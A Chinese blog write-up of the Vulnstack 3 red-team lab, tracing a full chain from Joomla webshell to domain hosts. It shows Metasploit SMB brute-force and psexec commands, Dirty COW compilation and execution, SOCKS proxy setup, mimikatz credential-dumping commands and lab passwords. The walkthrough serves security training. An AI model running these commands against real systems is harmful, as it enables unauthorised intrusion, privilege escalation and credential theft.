ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场

最新推荐文章于 2024-10-04 20:26:33 发布
最新推荐文章于 2024-10-04 20:26:33 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 红队打靶 文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/132021341
版权

文章目录

环境配置

靶场介绍

靶场地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合下面图片,进行了固定ip配置。

靶场设置

网络配置要求,攻击机kali为net8,外网的centos其中一个为net8,另一个net2
在这里插入图片描述

拓扑图(这里我的kali为192.168.1.5)

在这里插入图片描述

外网渗透

信息收集

端口扫描

使用nmap进行端口,服务,操作系统探测

nmap -sS -P0 -sV -O 192.168.1.110

得到目标开放了22,80和3306
在这里插入图片描述
访问一下目标的80端口,看到是个joomla CMS搭建的网站,脚本语言为php
在这里插入图片描述

目录扫描

dirb http://192.168.1.110/

发现目标存在admin目录
在这里插入图片描述
访问一下是个后台的登录界面,弱口令进不去
在这里插入图片描述

漏洞发现与利用

使用msf获取joomla cms相关信息

use auxiliary/scanner/http/joomla_version
set rhosts http://192.168.1.110/
run

得到具体版本,没啥用,不能利用
在这里插入图片描述
上御剑,扫一下后台,发现一大堆东西
phpinfo()
在这里插入图片描述
mysql配置信息
在这里插入图片描述
navicat远程连接mysql,看到管理员密码被加密了
在这里插入图片描述
这里可以根据官方文档,修改添加管理员账号密码
如何恢复或重置管理员密码?

这里注意表的名字改成你自己的
在这里插入图片描述

登录后台

http://192.168.1.103/administrator/index.php  admin2  secret

getshell

点击
extensions-->templates-->templates-->protostar details and files-->index.php-->save

写入蚁剑shell
在这里插入图片描述
连接成功
在这里插入图片描述
命令执行发现用不了,php开启了禁用函数
在这里插入图片描述
使用蚁剑插件绕过函数禁用
在这里插入图片描述

获取ssh账号密码,登录centos

看下目录里面有没有有用的信息,发现一个账号密码,前期信息收集知道开放了22端口,远程连接试一下
在这里插入图片描述
连接成功
在这里插入图片描述

提权

uname -r 发现linux内核版本很低,可以用脏牛提权

https://github.com/imust6226/dirtcow

靶机里vi dirty.c,直接将上面dirty.c里的内容复制进去,编译一下

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述

./dirty 123456  ---执行exp

创建账户:firefart,密码:123456

切换到firefart账户,获取root权限
在这里插入图片描述

内网渗透

建立代理

掏出祖传的EW(earthworm),上传到靶机并执行,让靶机当做进入内网的跳板
在这里插入图片描述
kali里记得修改一下走靶机地址

vim /etc/proxychains.conf  //配置proxychains

将最后一行的socks4注释掉,添加下面的行,端口为跳板机上的ew监听的8888:

socks5  192.168.1.100 8888

内网信息收集

直接上神器fscan

在这里插入图片描述

由此可以看出:

已经拿到root权限的centos:有两张网卡 一张是192.168.216.131 一张是192.168.93.100

Nginx代理服务器ubantu:192.168.93.120

一台非TEST域内win7专业版主机:192.168.93.30

一台TEST域内win2008主机:192.168.93.20

一台TEST域控主机win server 2012:192.168.93.10

还跑出来了疑似的SSH账号,尝试登录发现不正确,挂代理尝试登录

smb暴破,获取本地管理员密码

这里我的字典里没有这个密码,我手动加上去的,20,30都是这个密码

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set smbuser administrator
set pass_file top10k.txt
run

暴破密码:administrator 123qwe!ASD
在这里插入图片描述

横向移动

使用psexec模块上线msf

use exploit/windows/smb/psexec
set rhost 192.168.93.30
set payload windows/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
run

拿下win7
在这里插入图片描述
拿下win2008
在这里插入图片描述
接下来通过msf上传mimikatz,进行密码读取

#提升权限
privilege::debug

抓取密码
lsadump::lsa /patch

在这里插入图片描述

青衫木马牛
关注
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK红队评估红日靶场三)
weixin_45682839的博客
04-25 3560
ATT&CK红队评估红日靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
红日靶机(三)笔记
最新发布
LINGX5的博客
10-04 1453
相较于前边两个靶场环境,靶场三的难度还是稍难一点,有很多兔子洞,这就考验我们对已有信息的取舍和试错,以及对渗透测试优先级的判断。涉及到对数据库操作的试错,对 joomla 框架 cve 的快速学习,php 中 用到disabled_function 的 bypass ,对linux内核提权的取舍,对msf框架模块的熟悉与学习。包括了路由搭建、socks代理使用、smb服务爆破、psexec横向、kiwi(mimikatz)使用等。还使用的crackmapexec这款强大的工具。
红日vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1858
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
红日安全靶场3
weixin_48169878的博客
07-13 4343
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
红日靶场vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 1020
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
VulnStack-ATT&CK-3(红日靶场三)
buffedon的博客
07-12 1万+
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
红日内网打靶记录】红日3打靶(下)
weixin_54603520的博客
05-19 455
注意:蚁剑连接后无法执行命令时因为系统设置了函数黑名单,这里使用的时bypass插件去继续进行,我们也可以考虑使用哥斯拉或者蚁剑,因为这两个工具的传输是加密的,应该是可以直接执行命令的。这里发现查询到的ip并不是我们拿下的机器的IP,应该是什么软件流量代理造成的。所以我们这里查询出来的结果是其他端口。这里成功执行,并且帮我们创建了一个新的账号,我们可以直接设置密码,重新登录达到提权的目的。查询当前拿下的机器网络连接情况,这里发现了一个与其建立连接的机器,应该是通过93.100的机器去做代理的。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
基于ATT&CK安全能力评估与改进实践.pdf
08-08
通过安全大脑赋能,它可全面评估客户安全设备的整体防护能力,包括网络侧流量检测设备,邮件过滤设备等,也包括终端侧的查杀和沙箱等设备;此外,入侵者模拟可在客户授权的情况下,透过资产暴露的攻击面,进行实网...
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1662
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到控,从web渗透,到横向渗透最后到掌握控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
ATT&CK实战系列-红队评估红日靶场1)Vulnstack三层网络渗透靶场
qq_47289634的博客
07-07 464
换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了。保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网。
红日安全 ATTCK VulnStack靶场(三)
baynk的博客
07-12 3031
0x00 前言 内网真的有点难搞,总是会碰到一些奇怪的问题。。。基础不难,地动山摇。 不知道原版哪下的,就放个自己云盘的,这玩意压缩后只有20G,解压后有100G… 放个下载地址:提取码: uecu 拓扑图如下 除了centos的出口网卡的IP是需要调整外,其余网卡都不需要调整。 0x01 Web打点 直接访问网站 发现很熟悉,joomla cms,国外比较有名的cms,直接上工具,kali里面带的joomscan [+] FireWall Detector [++] Firewall not det
[红日靶机渗透] ATK&CK红队评估实战靶场
人若无名,便可专心练剑
02-08 1250
ATK&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个用于描述和分类针对计算机系统的攻击行为的知识库。红队评估是指模拟真实攻击者行为的一种安全评估方法,通过模拟攻击思路、技术和方法来评估目标系统的安全性。
ATT&CK实战系列-红队评估(一)
v2ish1yan的博客
02-26 899
这个靶场的流程,就是外网渗透拿到主机shell扫描内网存活主机,并查看是否存在历史漏洞使用内网代理和路由转发来对内网主机进行攻击应该还有很多思路,这个是比较简单的靶场,继续加油。
红日三打靶!!!
woshicainiao666的博客
02-02 1017
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
ATT\\\\&CK红队评估实战靶场
08-16
抱歉,我无法回答这个问题。我只能在提供的引用内容范围内提供答案。请您提供与红日靶场相关的引用内容,我将尽力为您提供答案。谢谢!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ATT&CK红队评估实战靶场(二)](https://blog.csdn.net/qq_53263789/article/details/115282950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [Windows系统——ATT&CK红队评估实战靶场(二)——CS方式](https://blog.csdn.net/qq_44029310/article/details/126039321)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值